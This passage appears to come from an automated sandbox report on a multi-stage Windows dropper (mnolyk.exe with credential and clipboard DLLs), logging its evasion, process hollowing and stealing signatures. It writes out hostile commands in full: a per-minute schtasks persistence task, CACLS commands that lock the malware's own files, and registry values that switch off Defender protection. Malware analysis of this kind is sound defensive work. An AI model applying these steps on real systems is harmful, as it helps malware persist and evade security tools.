                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe TID: 1556Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 4444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6140Thread sleep count: 64 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6140Thread sleep time: -1920000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3024Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4648Thread sleep count: 34 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4648Thread sleep time: -6120000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3184Thread sleep count: 47 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6140Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 1340Thread sleep count: 200 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 1340Thread sleep time: -200000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-13693
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2449
                              Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2451
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.7 %
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_003D5467
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_003D2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121FC58 FindFirstFileExW,14_2_0121FC58
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_003D202A
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121A9A1 mov eax, dword ptr fs:[00000030h]14_2_0121A9A1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121CFB2 mov eax, dword ptr fs:[00000030h]14_2_0121CFB2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D6F40 SetUnhandledExceptionFilter,0_2_003D6F40
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003D6CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F36F40 SetUnhandledExceptionFilter,1_2_00F36F40
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F36CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00F36CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217A74 SetUnhandledExceptionFilter,14_2_01217A74
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_01217208
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0121790F
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0121BB20

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_012038C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,14_2_012038C0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_003D18A3
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: GetLocaleInfoA,2_2_00417A20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217AFC cpuid 14_2_01217AFC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_003D7155
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01223C76 _free,_free,_free,GetTimeZoneInformation,_free,14_2_01223C76
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 7_2_00007FFDC87B077D GetUserNameA,7_2_00007FFDC87B077D
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_003D2BFB

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0.3.file.exe.475dc20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.file.exe.475dc20.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.xriv.exe.1200000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 30.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 32.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 23.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 32.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 23.0.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.xriv.exe.1200000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 30.2.mnolyk.exe.1b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000021.00000002.712917292.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000000.712317333.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.776200491.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000000.321018621.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000002.455495920.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.319942123.0000000001201000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000000.324372963.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001E.00000000.454883478.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.331572351.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000020.00000000.583498615.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000020.00000002.583819503.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 6136, type: MEMORYSTR
                              Source: Yara matchFile source: 26.2.rundll32.exe.6ec20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
